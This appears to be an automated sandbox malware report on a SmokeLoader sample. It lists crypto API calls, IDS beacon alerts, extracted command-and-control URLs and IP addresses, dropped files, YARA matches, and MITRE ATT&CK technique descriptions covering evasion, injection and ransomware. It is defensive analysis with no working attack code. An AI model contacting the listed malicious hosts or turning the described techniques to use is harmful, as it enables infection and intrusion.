Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Code function: 5_2_004A5A46 CryptBinaryToStringA,CryptBinaryToStringA,	5_2_004A5A46
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Code function: 5_2_004B9A3F CryptEncrypt,	5_2_004B9A3F
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Code function: 5_2_004B9AC3 CryptDestroyKey,CryptDestroyKey,	5_2_004B9AC3
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Code function: 5_2_004B9AD7 CryptReleaseContext,CryptReleaseContext,	5_2_004B9AD7
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Code function: 5_2_00499BD0 CryptDestroyKey,GetProcAddress,	5_2_00499BD0
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Code function: 5_2_004BBBE5 CryptDestroyHash,	5_2_004BBBE5
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Code function: 5_2_004EAB82 CryptDestroyKey,	5_2_004EAB82
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Code function: 5_2_004C9C5B CryptReleaseContext,	5_2_004C9C5B
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Code function: 5_2_004D3C6F CryptDestroyKey,	5_2_004D3C6F
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Code function: 5_2_004C6CE7 CryptDestroyKey,	5_2_004C6CE7
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Code function: 5_2_004B9C88 CryptBinaryToStringA,	5_2_004B9C88

Source: Traffic	Snort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.4:49696 -> 58.235.189.192:80
Source: Traffic	Snort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.4:49697 -> 211.119.84.112:80

Source: Malware configuration extractor	URLs: http://skinndia.com/tmp/
Source: Malware configuration extractor	URLs: http://cracker.biz/tmp/
Source: Malware configuration extractor	URLs: http://piratia-life.ru/tmp/

Source: C:\Users\user\AppData\Local\Temp\F50.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\EE5A.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\wdscede	Joe Sandbox ML: detected

Source: Yara match	File source: 6.2.F50.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.F50.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.567433680.0000000000413000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.528207435.0000000000413000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY

Source: Joe Sandbox View	IP Address: 5.135.247.111 5.135.247.111
Source: Joe Sandbox View	IP Address: 187.170.238.164 187.170.238.164

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: SmokeLoader

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\EE5A.exe

C:\Users\user\AppData\Local\Temp\F50.exe

C:\Users\user\AppData\Local\Temp\Wtfoiq.tmp

C:\Users\user\AppData\Roaming\wdscede

C:\Users\user\AppData\Roaming\wdscede:Zone.Identifier

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Windows Analysis Report
file.exe

Function 00401615 Relevance: 10.7, APIs: 7, Instructions: 206
nativeCOMMON

Function 00401636 Relevance: 10.7, APIs: 7, Instructions: 192
nativeCOMMON

Function 00401620 Relevance: 10.7, APIs: 7, Instructions: 175
nativeCOMMON

Function 00401633 Relevance: 10.7, APIs: 7, Instructions: 174
nativeCOMMON

Function 004017E4 Relevance: 4.7, APIs: 3, Instructions: 195
nativeCOMMON

Function 02C0003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Function 02C00E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Function 0040BA51 Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Function 0040C097 Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Function 0040BB6C Relevance: 1.5, APIs: 1, Instructions: 4
COMMONLIBRARYCODE

Function 004019F2 Relevance: 1.3, APIs: 1, Instructions: 61
sleepCOMMON

Function 00401A0A Relevance: 1.3, APIs: 1, Instructions: 55
sleepCOMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.
Tactics:	Impact
Data Sources:	File monitoring, Kernel drivers, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre